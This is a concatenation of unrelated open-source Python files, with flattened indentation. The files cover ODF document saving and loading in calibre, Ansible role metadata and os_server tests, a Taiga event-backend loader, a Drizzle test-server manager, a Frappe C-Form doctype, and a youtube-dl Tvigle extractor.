element in styles.xml
"""
stylenamelist = []
for top in segments:
stylenamelist = self._parseoneelement(top, stylenamelist)
stylelist = []
for e in self.automaticstyles.childNodes:
if e.getAttrNS(STYLENS,u'name') in stylenamelist:
stylelist.append(e)
return stylelist
def stylesxml(self):
""" Generates the styles.xml file """
xml=StringIO()
xml.write(_XMLPROLOGUE)
x = DocumentStyles()
x.write_open_tag(0, xml)
if self.fontfacedecls.hasChildNodes():
self.fontfacedecls.toXml(1, xml)
self.styles.toXml(1, xml)
a = AutomaticStyles()
a.write_open_tag(1, xml)
for s in self._used_auto_styles([self.masterstyles]):
s.toXml(2, xml)
a.write_close_tag(1, xml)
if self.masterstyles.hasChildNodes():
self.masterstyles.toXml(1, xml)
x.write_close_tag(0, xml)
return xml.getvalue()
def addPicture(self, filename, mediatype=None, content=None):
""" Add a picture
It uses the same convention as OOo, in that it saves the picture in
the zipfile in the subdirectory 'Pictures'
If passed a file ptr, mediatype must be set
"""
if content is None:
if mediatype is None:
mediatype, encoding = mimetypes.guess_type(filename)
if mediatype is None:
mediatype = ''
                try: ext = filename[filename.rindex('.'):]
                except ValueError: ext=''
else:
ext = mimetypes.guess_extension(mediatype)
manifestfn = "Pictures/%0.0f%s" % ((time.time()*10000000000), ext)
self.Pictures[manifestfn] = (IS_FILENAME, filename, mediatype)
else:
manifestfn = filename
self.Pictures[manifestfn] = (IS_IMAGE, content, mediatype)
return manifestfn
def addPictureFromFile(self, filename, mediatype=None):
""" Add a picture
It uses the same convention as OOo, in that it saves the picture in
the zipfile in the subdirectory 'Pictures'.
If mediatype is not given, it will be guessed from the filename
extension.
"""
if mediatype is None:
mediatype, encoding = mimetypes.guess_type(filename)
if mediatype is None:
mediatype = ''
try: ext = filename[filename.rindex('.'):]
except ValueError: ext=''
else:
ext = mimetypes.guess_extension(mediatype)
manifestfn = "Pictures/%0.0f%s" % ((time.time()*10000000000), ext)
self.Pictures[manifestfn] = (IS_FILENAME, filename, mediatype)
return manifestfn
def addPictureFromString(self, content, mediatype):
""" Add a picture
It uses the same convention as OOo, in that it saves the picture in
the zipfile in the subdirectory 'Pictures'. The content variable
is a string that contains the binary image data. The mediatype
indicates the image format.
"""
ext = mimetypes.guess_extension(mediatype)
manifestfn = "Pictures/%0.0f%s" % ((time.time()*10000000000), ext)
self.Pictures[manifestfn] = (IS_IMAGE, content, mediatype)
return manifestfn
def addThumbnail(self, filecontent=None):
""" Add a fixed thumbnail
The thumbnail in the library is big, so this is pretty useless.
"""
if filecontent is None:
import thumbnail
self.thumbnail = thumbnail.thumbnail()
else:
self.thumbnail = filecontent
def addObject(self, document, objectname=None):
""" Adds an object (subdocument). The object must be an OpenDocument class
The return value will be the folder in the zipfile the object is stored in
"""
self.childobjects.append(document)
if objectname is None:
document.folder = "%s/Object %d" % (self.folder, len(self.childobjects))
else:
document.folder = objectname
return ".%s" % document.folder
def _savePictures(self, object, folder):
hasPictures = False
for arcname, picturerec in object.Pictures.items():
what_it_is, fileobj, mediatype = picturerec
self.manifest.addElement(manifest.FileEntry(fullpath="%s%s" % ( folder ,arcname), mediatype=mediatype))
hasPictures = True
if what_it_is == IS_FILENAME:
self._z.write(fileobj, arcname, zipfile.ZIP_STORED)
else:
zi = zipfile.ZipInfo(str(arcname), self._now)
zi.compress_type = zipfile.ZIP_STORED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, fileobj)
# According to section 17.7.3 in ODF 1.1, the pictures folder should not have a manifest entry
# if hasPictures:
# self.manifest.addElement(manifest.FileEntry(fullpath="%sPictures/" % folder, mediatype=""))
# Look in subobjects
subobjectnum = 1
for subobject in object.childobjects:
self._savePictures(subobject,'%sObject %d/' % (folder, subobjectnum))
subobjectnum += 1
def __replaceGenerator(self):
""" Section 3.1.1: The application MUST NOT export the original identifier
belonging to the application that created the document.
"""
for m in self.meta.childNodes[:]:
if m.qname == (METANS, u'generator'):
self.meta.removeChild(m)
self.meta.addElement(meta.Generator(text=TOOLSVERSION))
def save(self, outputfile, addsuffix=False):
""" Save the document under the filename.
If the filename is '-' then save to stdout
"""
if outputfile == '-':
outputfp = zipfile.ZipFile(sys.stdout,"w")
else:
if addsuffix:
outputfile = outputfile + odmimetypes.get(self.mimetype,'.xxx')
outputfp = zipfile.ZipFile(outputfile, "w")
self.__zipwrite(outputfp)
outputfp.close()
def write(self, outputfp):
""" User API to write the ODF file to an open file descriptor
Writes the ZIP format
"""
zipoutputfp = zipfile.ZipFile(outputfp,"w")
self.__zipwrite(zipoutputfp)
def __zipwrite(self, outputfp):
""" Write the document to an open file pointer
This is where the real work is done
"""
self._z = outputfp
self._now = time.localtime()[:6]
self.manifest = manifest.Manifest()
# Write mimetype
zi = zipfile.ZipInfo('mimetype', self._now)
zi.compress_type = zipfile.ZIP_STORED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, self.mimetype)
self._saveXmlObjects(self,"")
# Write pictures
self._savePictures(self,"")
# Write the thumbnail
if self.thumbnail is not None:
self.manifest.addElement(manifest.FileEntry(fullpath="Thumbnails/", mediatype=''))
self.manifest.addElement(manifest.FileEntry(fullpath="Thumbnails/thumbnail.png", mediatype=''))
zi = zipfile.ZipInfo("Thumbnails/thumbnail.png", self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, self.thumbnail)
# Write any extra files
for op in self._extra:
if op.filename == "META-INF/documentsignatures.xml": continue # Don't save signatures
self.manifest.addElement(manifest.FileEntry(fullpath=op.filename, mediatype=op.mediatype))
zi = zipfile.ZipInfo(op.filename.encode('utf-8'), self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
if op.content is not None:
self._z.writestr(zi, op.content)
# Write manifest
zi = zipfile.ZipInfo("META-INF/manifest.xml", self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, self.__manifestxml() )
del self._z
del self._now
del self.manifest
def _saveXmlObjects(self, object, folder):
if self == object:
self.manifest.addElement(manifest.FileEntry(fullpath="/", mediatype=object.mimetype))
else:
self.manifest.addElement(manifest.FileEntry(fullpath=folder, mediatype=object.mimetype))
# Write styles
self.manifest.addElement(manifest.FileEntry(fullpath="%sstyles.xml" % folder, mediatype="text/xml"))
zi = zipfile.ZipInfo("%sstyles.xml" % folder, self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, object.stylesxml() )
# Write content
self.manifest.addElement(manifest.FileEntry(fullpath="%scontent.xml" % folder, mediatype="text/xml"))
zi = zipfile.ZipInfo("%scontent.xml" % folder, self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, object.contentxml() )
# Write settings
if object.settings.hasChildNodes():
self.manifest.addElement(manifest.FileEntry(fullpath="%ssettings.xml" % folder, mediatype="text/xml"))
zi = zipfile.ZipInfo("%ssettings.xml" % folder, self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, object.settingsxml() )
# Write meta
if self == object:
self.manifest.addElement(manifest.FileEntry(fullpath="meta.xml", mediatype="text/xml"))
zi = zipfile.ZipInfo("meta.xml", self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, object.metaxml() )
# Write subobjects
subobjectnum = 1
for subobject in object.childobjects:
self._saveXmlObjects(subobject, '%sObject %d/' % (folder, subobjectnum))
subobjectnum += 1
# Document's DOM methods
def createElement(self, element):
""" Inconvenient interface to create an element, but follows XML-DOM.
Does not allow attributes as argument, therefore can't check grammar.
"""
return element(check_grammar=False)
def createTextNode(self, data):
""" Method to create a text node """
return element.Text(data)
def createCDATASection(self, data):
""" Method to create a CDATA section """
        return element.CDATASection(data)
def getMediaType(self):
""" Returns the media type """
return self.mimetype
def getStyleByName(self, name):
""" Finds a style object based on the name """
ncname = make_NCName(name)
if self._styles_dict == {}:
self.rebuild_caches()
return self._styles_dict.get(ncname, None)
def getElementsByType(self, element):
""" Gets elements based on the type, which is function from text.py, draw.py etc. """
obj = element(check_grammar=False)
if self.element_dict == {}:
self.rebuild_caches()
return self.element_dict.get(obj.qname, [])
# Convenience functions
def OpenDocumentChart():
""" Creates a chart document """
doc = OpenDocument('application/vnd.oasis.opendocument.chart')
doc.chart = Chart()
doc.body.addElement(doc.chart)
return doc
def OpenDocumentDrawing():
""" Creates a drawing document """
doc = OpenDocument('application/vnd.oasis.opendocument.graphics')
doc.drawing = Drawing()
doc.body.addElement(doc.drawing)
return doc
def OpenDocumentImage():
""" Creates an image document """
doc = OpenDocument('application/vnd.oasis.opendocument.image')
doc.image = Image()
doc.body.addElement(doc.image)
return doc
def OpenDocumentPresentation():
""" Creates a presentation document """
doc = OpenDocument('application/vnd.oasis.opendocument.presentation')
doc.presentation = Presentation()
doc.body.addElement(doc.presentation)
return doc
def OpenDocumentSpreadsheet():
""" Creates a spreadsheet document """
doc = OpenDocument('application/vnd.oasis.opendocument.spreadsheet')
doc.spreadsheet = Spreadsheet()
doc.body.addElement(doc.spreadsheet)
return doc
def OpenDocumentText():
""" Creates a text document """
doc = OpenDocument('application/vnd.oasis.opendocument.text')
doc.text = Text()
doc.body.addElement(doc.text)
return doc
def OpenDocumentTextMaster():
""" Creates a text master document """
doc = OpenDocument('application/vnd.oasis.opendocument.text-master')
doc.text = Text()
doc.body.addElement(doc.text)
return doc
def __loadxmlparts(z, manifest, doc, objectpath):
from load import LoadParser
from xml.sax import make_parser, handler
for xmlfile in (objectpath+'settings.xml', objectpath+'meta.xml', objectpath+'content.xml', objectpath+'styles.xml'):
if not manifest.has_key(xmlfile):
continue
try:
xmlpart = z.read(xmlfile)
doc._parsing = xmlfile
parser = make_parser()
parser.setFeature(handler.feature_namespaces, 1)
parser.setContentHandler(LoadParser(doc))
parser.setErrorHandler(handler.ErrorHandler())
inpsrc = InputSource()
inpsrc.setByteStream(StringIO(xmlpart))
parser.setFeature(handler.feature_external_ges, False) # Changed by Kovid to ignore external DTDs
parser.parse(inpsrc)
del doc._parsing
except KeyError, v: pass
def load(odffile):
""" Load an ODF file into memory
Returns a reference to the structure
"""
z = zipfile.ZipFile(odffile)
try:
mimetype = z.read('mimetype')
except KeyError: # Added by Kovid to handle malformed odt files
mimetype = 'application/vnd.oasis.opendocument.text'
doc = OpenDocument(mimetype, add_generator=False)
    # Look in the manifest file to see which of the four XML parts are there
manifestpart = z.read('META-INF/manifest.xml')
manifest = manifestlist(manifestpart)
__loadxmlparts(z, manifest, doc, '')
for mentry,mvalue in manifest.items():
if mentry[:9] == "Pictures/" and len(mentry) > 9:
doc.addPicture(mvalue['full-path'], mvalue['media-type'], z.read(mentry))
elif mentry == "Thumbnails/thumbnail.png":
doc.addThumbnail(z.read(mentry))
elif mentry in ('settings.xml', 'meta.xml', 'content.xml', 'styles.xml'):
pass
# Load subobjects into structure
elif mentry[:7] == "Object " and len(mentry) < 11 and mentry[-1] == "/":
subdoc = OpenDocument(mvalue['media-type'], add_generator=False)
doc.addObject(subdoc, "/" + mentry[:-1])
__loadxmlparts(z, manifest, subdoc, mentry)
elif mentry[:7] == "Object ":
pass # Don't load subobjects as opaque objects
else:
if mvalue['full-path'][-1] == '/':
doc._extra.append(OpaqueObject(mvalue['full-path'], mvalue['media-type'], None))
else:
doc._extra.append(OpaqueObject(mvalue['full-path'], mvalue['media-type'], z.read(mentry)))
# Add the SUN junk here to the struct somewhere
# It is cached data, so it can be out-of-date
z.close()
b = doc.getElementsByType(Body)
if mimetype[:39] == 'application/vnd.oasis.opendocument.text':
doc.text = b[0].firstChild
elif mimetype[:43] == 'application/vnd.oasis.opendocument.graphics':
doc.graphics = b[0].firstChild
elif mimetype[:47] == 'application/vnd.oasis.opendocument.presentation':
doc.presentation = b[0].firstChild
elif mimetype[:46] == 'application/vnd.oasis.opendocument.spreadsheet':
doc.spreadsheet = b[0].firstChild
elif mimetype[:40] == 'application/vnd.oasis.opendocument.chart':
doc.chart = b[0].firstChild
elif mimetype[:40] == 'application/vnd.oasis.opendocument.image':
doc.image = b[0].firstChild
elif mimetype[:42] == 'application/vnd.oasis.opendocument.formula':
doc.formula = b[0].firstChild
return doc
# vim: set expandtab sw=4 :
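# A usage sketch added for illustration; it is not part of the original
# module. It assumes the standard odfpy package layout, where text.py (with
# the P paragraph element) sits next to this file; the output filename is
# arbitrary.
if __name__ == "__main__":
    from text import P
    doc = OpenDocumentText()                 # convenience constructor above
    doc.text.addElement(P(text=u"Hello, OpenDocument"))
    doc.save("hello", addsuffix=True)        # writes hello.odt via __zipwrite
    existing = load("hello.odt")             # round-trip through load()
    print existing.getMediaType()            # application/vnd.oasis.opendocument.text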
| ashang/calibre | src/odf/opendocument.py | Python | gpl-3.0 | 26,274 |
# (c) 2014 Michael DeHaan, <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.errors import AnsibleParserError, AnsibleError
from ansible.module_utils._text import to_native
from ansible.module_utils.six import iteritems, string_types
from ansible.playbook.attribute import Attribute, FieldAttribute
from ansible.playbook.base import Base
from ansible.playbook.helpers import load_list_of_roles
from ansible.playbook.role.include import RoleInclude
from ansible.playbook.role.requirement import RoleRequirement
__all__ = ['RoleMetadata']
class RoleMetadata(Base):
'''
This class wraps the parsing and validation of the optional metadata
within each Role (meta/main.yml).
'''
_allow_duplicates = FieldAttribute(isa='bool', default=False)
_dependencies = FieldAttribute(isa='list', default=list)
_galaxy_info = FieldAttribute(isa='GalaxyInfo')
def __init__(self, owner=None):
self._owner = owner
super(RoleMetadata, self).__init__()
@staticmethod
def load(data, owner, variable_manager=None, loader=None):
'''
Returns a new RoleMetadata object based on the datastructure passed in.
'''
if not isinstance(data, dict):
raise AnsibleParserError("the 'meta/main.yml' for role %s is not a dictionary" % owner.get_name())
m = RoleMetadata(owner=owner).load_data(data, variable_manager=variable_manager, loader=loader)
return m
def _load_dependencies(self, attr, ds):
'''
This is a helper loading function for the dependencies list,
which returns a list of RoleInclude objects
'''
roles = []
if ds:
if not isinstance(ds, list):
raise AnsibleParserError("Expected role dependencies to be a list.", obj=self._ds)
for role_def in ds:
if isinstance(role_def, string_types) or 'role' in role_def or 'name' in role_def:
roles.append(role_def)
continue
try:
# role_def is new style: { src: 'galaxy.role,version,name', other_vars: "here" }
def_parsed = RoleRequirement.role_yaml_parse(role_def)
if def_parsed.get('name'):
role_def['name'] = def_parsed['name']
roles.append(role_def)
except AnsibleError as exc:
raise AnsibleParserError(to_native(exc), obj=role_def, orig_exc=exc)
current_role_path = None
if self._owner:
current_role_path = os.path.dirname(self._owner._role_path)
try:
return load_list_of_roles(roles, play=self._owner._play, current_role_path=current_role_path, variable_manager=self._variable_manager,
loader=self._loader)
except AssertionError as e:
raise AnsibleParserError("A malformed list of role dependencies was encountered.", obj=self._ds, orig_exc=e)
def _load_galaxy_info(self, attr, ds):
'''
This is a helper loading function for the galaxy info entry
in the metadata, which returns a GalaxyInfo object rather than
a simple dictionary.
'''
return ds
def serialize(self):
return dict(
allow_duplicates=self._allow_duplicates,
dependencies=self._dependencies,
)
def deserialize(self, data):
setattr(self, 'allow_duplicates', data.get('allow_duplicates', False))
setattr(self, 'dependencies', data.get('dependencies', []))
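# A short illustration added for clarity, not part of the original module:
# the meta/main.yml document that RoleMetadata.load() consumes is a plain
# mapping keyed by the field attributes defined above. The YAML below is
# invented purely to show that shape.
if __name__ == '__main__':
    import textwrap
    import yaml
    sample = yaml.safe_load(textwrap.dedent('''
        allow_duplicates: false
        dependencies:
          - role: common
        galaxy_info:
          author: someone
    '''))
    # keys line up with the FieldAttributes on RoleMetadata
    print(sorted(sample))  # ['allow_duplicates', 'dependencies', 'galaxy_info']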
| andmos/ansible | lib/ansible/playbook/role/metadata.py | Python | gpl-3.0 | 4,362 |
# Copyright (C) 2014 Andrey Antukh <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import abc
import importlib
from django.core.exceptions import ImproperlyConfigured
from django.conf import settings
class BaseEventsPushBackend(object, metaclass=abc.ABCMeta):
@abc.abstractmethod
def emit_event(self, message:str, *, routing_key:str, channel:str="events"):
pass
def load_class(path):
"""
Load class from path.
"""
mod_name, klass_name = path.rsplit('.', 1)
try:
mod = importlib.import_module(mod_name)
except AttributeError as e:
raise ImproperlyConfigured('Error importing {0}: "{1}"'.format(mod_name, e))
try:
klass = getattr(mod, klass_name)
except AttributeError:
raise ImproperlyConfigured('Module "{0}" does not define a "{1}" class'.format(mod_name, klass_name))
return klass
def get_events_backend(path:str=None, options:dict=None):
if path is None:
path = getattr(settings, "EVENTS_PUSH_BACKEND", None)
if path is None:
raise ImproperlyConfigured("Events push system not configured")
if options is None:
options = getattr(settings, "EVENTS_PUSH_BACKEND_OPTIONS", {})
cls = load_class(path)
return cls(**options)
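# A minimal sketch added for illustration (not part of the original module):
# a no-op backend satisfying the abstract interface above. A real deployment
# would point EVENTS_PUSH_BACKEND at the dotted path of a concrete class
# like this one.
class PrintEventsPushBackend(BaseEventsPushBackend):
    def emit_event(self, message:str, *, routing_key:str, channel:str="events"):
        print("[{0}] {1} -> {2}".format(channel, routing_key, message))

if __name__ == "__main__":
    backend = PrintEventsPushBackend()
    backend.emit_event('{"pk": 1}', routing_key="changes.project.1")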
| WALR/taiga-back | taiga/events/backends/base.py | Python | agpl-3.0 | 1,894 |
#! /usr/bin/env python
# -*- mode: python; indent-tabs-mode: nil; -*-
# vim:expandtab:shiftwidth=2:tabstop=2:smarttab:
#
# Copyright (C) 2010,2011 Patrick Crews
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
""" drizzled.py: code to allow a serverManager
to provision and start up a drizzled server object
for test execution
"""
# imports
import os
from lib.server_mgmt.server import Server
class drizzleServer(Server):
""" represents a drizzle server, its possessions
(datadir, ports, etc), and methods for controlling
and querying it
TODO: create a base server class that contains
standard methods from which we can inherit
Currently there are definitely methods / attr
which are general
"""
def __init__( self, name, server_manager, code_tree, default_storage_engine
, server_options, requester, test_executor, workdir_root):
super(drizzleServer, self).__init__( name
, server_manager
, code_tree
, default_storage_engine
, server_options
, requester
, test_executor
, workdir_root)
self.preferred_base_port = 9306
# client files
self.drizzledump = self.code_tree.drizzledump
self.drizzle_client = self.code_tree.drizzle_client
self.drizzleimport = self.code_tree.drizzleimport
self.drizzleslap = self.code_tree.drizzleslap
self.server_path = self.code_tree.drizzle_server
self.drizzle_client_path = self.code_tree.drizzle_client
self.schemawriter = self.code_tree.schemawriter
self.trx_reader = self.code_tree.trx_reader
# Get our ports
self.port_block = self.system_manager.port_manager.get_port_block( self.name
, self.preferred_base_port
, 6 )
self.master_port = self.port_block[0]
self.drizzle_tcp_port = self.port_block[1]
self.mc_port = self.port_block[2]
self.pbms_port = self.port_block[3]
self.rabbitmq_node_port = self.port_block[4]
self.json_server_port = self.port_block[5]
# Generate our working directories
self.dirset = {'var_%s' %(self.name): {'std_data_ln':( os.path.join(self.code_tree.testdir,'std_data'))
,'log':None
,'run':None
,'tmp':None
,'master-data': {'local': { 'test':None
, 'mysql':None
}
}
}
}
self.workdir = self.system_manager.create_dirset( workdir_root
, self.dirset)
self.vardir = self.workdir
self.tmpdir = os.path.join(self.vardir,'tmp')
self.rundir = os.path.join(self.vardir,'run')
self.logdir = os.path.join(self.vardir,'log')
self.datadir = os.path.join(self.vardir,'master-data')
self.error_log = os.path.join(self.logdir,'error.log')
self.pid_file = os.path.join(self.rundir,('%s.pid' %(self.name)))
self.socket_file = os.path.join(self.vardir, ('%s.sock' %(self.name)))
if len(self.socket_file) > 107:
# MySQL has a limitation of 107 characters for socket file path
# we copy the mtr workaround of creating one in /tmp
self.logging.verbose("Default socket file path: %s" %(self.socket_file))
self.socket_file = "/tmp/%s_%s.%s.sock" %(self.system_manager.uuid
,self.owner
,self.name)
self.logging.verbose("Changing to alternate: %s" %(self.socket_file))
self.timer_file = os.path.join(self.logdir,('timer'))
# Do magic to create a config file for use with the slave
# plugin
self.slave_config_file = os.path.join(self.logdir,'slave.cnf')
self.create_slave_config_file()
self.snapshot_path = os.path.join(self.tmpdir,('snapshot_%s' %(self.master_port)))
# We want to use --secure-file-priv = $vardir by default
# but there are times / tools when we need to shut this off
if self.no_secure_file_priv:
self.secure_file_string = ''
else:
self.secure_file_string = "--secure-file-priv='%s'" %(self.vardir)
self.user_string = '--user=root'
self.initialize_databases()
self.take_db_snapshot()
self.logging.debug_class(self)
def report(self):
""" We print out some general useful info """
report_values = [ 'name'
, 'master_port'
, 'drizzle_tcp_port'
, 'mc_port'
, 'pbms_port'
, 'rabbitmq_node_port'
, 'vardir'
, 'status'
]
self.logging.info("%s server:" %(self.owner))
for key in report_values:
value = vars(self)[key]
self.logging.info("%s: %s" %(key.upper(), value))
def get_start_cmd(self):
""" Return the command string that will start up the server
as desired / intended
"""
server_args = [ self.process_server_options()
, "--mysql-protocol.port=%d" %(self.master_port)
, "--mysql-protocol.connect-timeout=60"
, "--innodb.data-file-path=ibdata1:20M:autoextend"
, "--sort-buffer-size=256K"
, "--max-heap-table-size=1M"
, "--mysql-unix-socket-protocol.path=%s" %(self.socket_file)
, "--pid-file=%s" %(self.pid_file)
, "--drizzle-protocol.port=%d" %(self.drizzle_tcp_port)
, "--default-storage-engine=%s" %(self.default_storage_engine)
, "--datadir=%s" %(self.datadir)
, "--tmpdir=%s" %(self.tmpdir)
, self.secure_file_string
, self.user_string
]
if self.gdb:
server_args.append('--gdb')
return self.system_manager.handle_gdb_reqs(self, server_args)
else:
return "%s %s %s & " % ( self.cmd_prefix
, self.server_path
, " ".join(server_args)
)
def get_stop_cmd(self):
""" Return the command that will shut us down """
return "%s --user=root --port=%d --connect-timeout=5 --silent --password= --shutdown " %(self.drizzle_client_path, self.master_port)
def get_ping_cmd(self):
"""Return the command string that will
ping / check if the server is alive
"""
return "%s --ping --port=%d --user=root" % (self.drizzle_client_path, self.master_port)
def is_started(self):
""" Determine if the server is up and running -
this may vary from server type to server type
"""
# We experiment with waiting for a pid file to be created vs. pinging
# This is what test-run.pl does and it helps us pass logging_stats tests
# while not self.ping_server(server, quiet=True) and timer != timeout:
return self.system_manager.find_path( [self.pid_file]
, required=0)
def create_slave_config_file(self):
""" Create a config file suitable for use
with the slave-plugin. This allows
us to tie other servers in easily
"""
config_data = [ "[master1]"
, "master-host=127.0.0.1"
, "master-port=%d" %self.master_port
, "master-user=root"
, "master-pass=''"
, "max-reconnects=100"
#, "seconds-between-reconnects=20"
]
outfile = open(self.slave_config_file,'w')
for line in config_data:
outfile.write("%s\n" %(line))
outfile.close()
| kraziegent/mysql-5.6 | xtrabackup/test/kewpie/lib/server_mgmt/drizzled.py | Python | gpl-2.0 | 9,584 |
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import flt
from frappe import _
from frappe.model.document import Document
class CForm(Document):
def validate(self):
"""Validate invoice that c-form is applicable
and no other c-form is received for that"""
for d in self.get('invoice_details'):
if d.invoice_no:
inv = frappe.db.sql("""select c_form_applicable, c_form_no from
`tabSales Invoice` where name = %s and docstatus = 1""", d.invoice_no)
if inv and inv[0][0] != 'Yes':
frappe.throw("C-form is not applicable for Invoice: %s" % d.invoice_no)
elif inv and inv[0][1] and inv[0][1] != self.name:
frappe.throw("""Invoice %s is tagged in another C-form: %s.
If you want to change C-form no for this invoice,
please remove invoice no from the previous c-form and then try again""" %
(d.invoice_no, inv[0][1]))
elif not inv:
frappe.throw("Row %s: Invoice %s is invalid, it might be cancelled / does not exist. \
Please enter a valid Invoice" % d.idx, d.invoice_no)
def on_update(self):
""" Update C-Form No on invoices"""
self.set_total_invoiced_amount()
def on_submit(self):
self.set_cform_in_sales_invoices()
def before_cancel(self):
# remove cform reference
frappe.db.sql("""update `tabSales Invoice` set c_form_no=null where c_form_no=%s""", self.name)
def set_cform_in_sales_invoices(self):
inv = [d.invoice_no for d in self.get('invoice_details')]
if inv:
frappe.db.sql("""update `tabSales Invoice` set c_form_no=%s, modified=%s where name in (%s)""" %
('%s', '%s', ', '.join(['%s'] * len(inv))), tuple([self.name, self.modified] + inv))
frappe.db.sql("""update `tabSales Invoice` set c_form_no = null, modified = %s
where name not in (%s) and ifnull(c_form_no, '') = %s""" %
('%s', ', '.join(['%s']*len(inv)), '%s'), tuple([self.modified] + inv + [self.name]))
else:
frappe.throw(_("Please enter atleast 1 invoice in the table"))
def set_total_invoiced_amount(self):
total = sum([flt(d.grand_total) for d in self.get('invoice_details')])
frappe.db.set(self, 'total_invoiced_amount', total)
def get_invoice_details(self, invoice_no):
""" Pull details from invoices for referrence """
if invoice_no:
inv = frappe.db.get_value("Sales Invoice", invoice_no,
["posting_date", "territory", "net_total", "grand_total"], as_dict=True)
return {
'invoice_date' : inv.posting_date,
'territory' : inv.territory,
'net_total' : inv.net_total,
'grand_total' : inv.grand_total
}
| suyashphadtare/sajil-final-erp | erpnext/erpnext/accounts/doctype/c_form/c_form.py | Python | agpl-3.0 | 2,694 |
# encoding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
float_or_none,
parse_age_limit,
)
class TvigleIE(InfoExtractor):
IE_NAME = 'tvigle'
IE_DESC = 'Интернет-телевидение Tvigle.ru'
_VALID_URL = r'http://(?:www\.)?tvigle\.ru/(?:[^/]+/)+(?P<id>[^/]+)/$'
_TESTS = [
{
'url': 'http://www.tvigle.ru/video/sokrat/',
'md5': '36514aed3657d4f70b4b2cef8eb520cd',
'info_dict': {
'id': '1848932',
'display_id': 'sokrat',
'ext': 'flv',
'title': 'Сократ',
'description': 'md5:a05bd01be310074d5833efc6743be95e',
'duration': 6586,
'age_limit': 0,
},
},
{
'url': 'http://www.tvigle.ru/video/vladimir-vysotskii/vedushchii-teleprogrammy-60-minut-ssha-o-vladimire-vysotskom/',
'md5': 'd9012d7c7c598fe7a11d7fb46dc1f574',
'info_dict': {
'id': '5142516',
'ext': 'mp4',
'title': 'Ведущий телепрограммы «60 минут» (США) о Владимире Высоцком',
'description': 'md5:027f7dc872948f14c96d19b4178428a4',
'duration': 186.080,
'age_limit': 0,
},
},
]
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
video_id = self._html_search_regex(
r'<li class="video-preview current_playing" id="(\d+)">', webpage, 'video id')
video_data = self._download_json(
'http://cloud.tvigle.ru/api/play/video/%s/' % video_id, display_id)
item = video_data['playlist']['items'][0]
title = item['title']
description = item['description']
thumbnail = item['thumbnail']
duration = float_or_none(item.get('durationMilliseconds'), 1000)
age_limit = parse_age_limit(item.get('ageRestrictions'))
formats = []
for vcodec, fmts in item['videos'].items():
for quality, video_url in fmts.items():
formats.append({
'url': video_url,
'format_id': '%s-%s' % (vcodec, quality),
'vcodec': vcodec,
'height': int(quality[:-1]),
'filesize': item['video_files_size'][vcodec][quality],
})
self._sort_formats(formats)
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'age_limit': age_limit,
'formats': formats,
}
| 0x7678/youtube-dl | youtube_dl/extractor/tvigle.py | Python | unlicense | 2,889 |
import mock
import pytest
import yaml
import inspect
import collections
from ansible.module_utils.six import string_types
from ansible.modules.cloud.openstack import os_server
class AnsibleFail(Exception):
pass
class AnsibleExit(Exception):
pass
def params_from_doc(func):
'''This function extracts the docstring from the specified function,
parses it as a YAML document, and returns parameters for the os_server
module.'''
doc = inspect.getdoc(func)
cfg = yaml.load(doc)
for task in cfg:
for module, params in task.items():
for k, v in params.items():
if k in ['nics'] and isinstance(v, string_types):
params[k] = [v]
task[module] = collections.defaultdict(str,
params)
return cfg[0]['os_server']
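# An illustrative helper added for clarity (not part of the original tests):
# the docstring-as-YAML trick above turns each test method's docstring into
# module parameters. The function below is hypothetical and only shows the
# resulting shape.
def _example_docstring_params():
    '''
    - os_server:
        image: cirros
        nics: net-id=1234
    '''

# params_from_doc(_example_docstring_params) yields a defaultdict where
# params['image'] == 'cirros' and params['nics'] == ['net-id=1234'].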
class FakeCloud (object):
ports = [
{'name': 'port1', 'id': '1234'},
{'name': 'port2', 'id': '4321'},
]
networks = [
{'name': 'network1', 'id': '5678'},
{'name': 'network2', 'id': '8765'},
]
images = [
{'name': 'cirros', 'id': '1'},
{'name': 'fedora', 'id': '2'},
